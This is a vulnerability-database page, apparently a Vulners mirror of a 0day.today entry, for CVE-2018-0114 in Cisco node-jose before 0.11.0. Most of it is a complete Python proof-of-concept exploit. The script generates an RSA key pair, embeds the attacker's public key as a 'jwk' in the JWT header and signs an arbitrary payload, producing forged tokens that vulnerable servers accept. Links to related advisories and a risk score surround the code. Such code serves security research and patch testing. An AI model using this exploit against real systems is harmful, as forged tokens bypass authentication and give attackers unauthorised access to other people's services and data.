Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cisco node-jos < 0.11.0 - Re-sign Tokens Exploit

🗓️ 20 Mar 2018 00:00:00Reported by zioBlackType 
zdt
 zdt🔗 0day.today👁 44 Views

Cisco node-jos < 0.11.0 - Re-sign Tokens Exploit. POC of CVE-2018-0114 Cisco node-jose <0.11.0. RSA key creation. Token forging

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2018-0114
4 Jan 201806:29
attackerkb
Circl		CVE-2018-0114
2 Aug 202310:00
circl
CNVD		Cisco node-jose open source library security bypass vulnerability
25 Dec 201700:00
cnvd
CVE		CVE-2018-0114
4 Jan 201806:00
cve
Cvelist		CVE-2018-0114
4 Jan 201806:00
cvelist
GithubExploit		jwt-attack-suite
14 Apr 202606:44
githubexploit
Exploit DB		Cisco node-jos &lt; 0.11.0 - Re-sign Tokens
20 Mar 201800:00
exploitdb
exploitpack		Cisco node-jos 0.11.0 - Re-sign Tokens
20 Mar 201800:00
exploitpack
Github Security Blog		Cisco node-jose improper validation of JWT signature
13 May 202201:17
github
NVD		CVE-2018-0114
4 Jan 201806:29
nvd
Rows per page
import base64
import urllib
import rsa
import sys
 
#zi0Black
 
'''
POC of CVE-2018-0114 Cisco node-jose <0.11.0
 
Created by Andrea Cappa aka @zi0Black (GitHub,Twitter,Telegram)
 
Mail: [email protected]
Site: https://zioblack.xyz
 
A special thanks to Louis Nyffenegger, the founder of PentesterLab, for all the help he provided to allow me to write this script.
 
Mail: [email protected]
Site: https://pentesterlab.com
 
'''
 
def generate_key (key_size):
    #create rsa priv & public key
    print ("[+]Creating-RSA-pair-key")
    (public_key,private_key)=rsa.newkeys(key_size,poolsize=8)
    print ("\t[+]Pair-key-created")
    return private_key, public_key
 
def to_bytes(n, length, endianess='big'):
    h = '%x' % n
    s = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex')
    return s if endianess == 'big' else s[::-1]
 
def generate_header_payload(payload,pubkey):
    #create header and payload
    print ("[+]Assembling-the-header-and-the-payload")
    xn = pubkey.n
    xe = pubkey.e
    n=base64.urlsafe_b64encode(to_bytes(xn,sys.getsizeof(xn),'big'))
    e=base64.urlsafe_b64encode(to_bytes(xe,sys.getsizeof(xe),'big'))
    headerAndPayload = base64.b64encode('{"alg":"RS256",'
                                        '"jwk":{"kty":"RSA",'
                                        '"kid":"[email protected]",'
                                        '"use":"sig",'
                                        '"n":"'+n+'",'
                                        '"e":"'+e+'"}}')
    headerAndPayload=headerAndPayload+"."+base64.b64encode(payload)
    headerAndPayload = headerAndPayload.encode('utf-8').replace("=","")
    print ("\t[+]Assembed")
    return headerAndPayload
 
def generate_signature (firstpart,privkey):
    #create signature
    signature = rsa.sign(firstpart,privkey,'SHA-256')
    signatureEnc = base64.b64encode(signature).encode('utf-8').replace("=", "")
    print ("[+]Signature-created")
    return signatureEnc
 
def create_token(headerAndPayload,sign):
    print ("[+]Forging-of-the-token\n\n")
    token = headerAndPayload+"."+sign
    token = urllib.quote_plus(token)
    return token
 
 
if(len(sys.argv)>0):
    payload = str(sys.argv[1])
    key_size = sys.argv[2]
else:
    payload = 'somthings'
 
banner="""
   _____  __      __  ______            ___     ___    __    ___              ___    __   __   _  _   
  / ____| \ \    / / |  ____|          |__ \   / _ \  /_ |  / _ \            / _ \  /_ | /_ | | || |                    
 | |       \ \  / /  | |__     ______     ) | | | | |  | | | (_) |  ______  | | | |  | |  | | | || |_ 
 | |        \ \/ /   |  __|   |______|   / /  | | | |  | |  > _ <  |______| | | | |  | |  | | |__   _|
 | |____     \  /    | |____            / /_  | |_| |  | | | (_) |          | |_| |  | |  | |    | |  
  \_____|     \/     |______|          |____|  \___/   |_|  \___/            \___/   |_|  |_|    |_|    by @zi0Black    
"""
 
if __name__ == '__main__':
    print (banner)
    (privatekey,publickey) = generate_key(key_size)
    firstPart = generate_header_payload(payload,publickey)
    signature = generate_signature(firstPart,privatekey)
    token = create_token(firstPart,signature)
    print(token)

#  0day.today [2018-04-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Mar 2018 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.84691
cisco node-jos. re-sign tokens exploit. poc. cve-2018-0114. rsa key creation. token forging.
44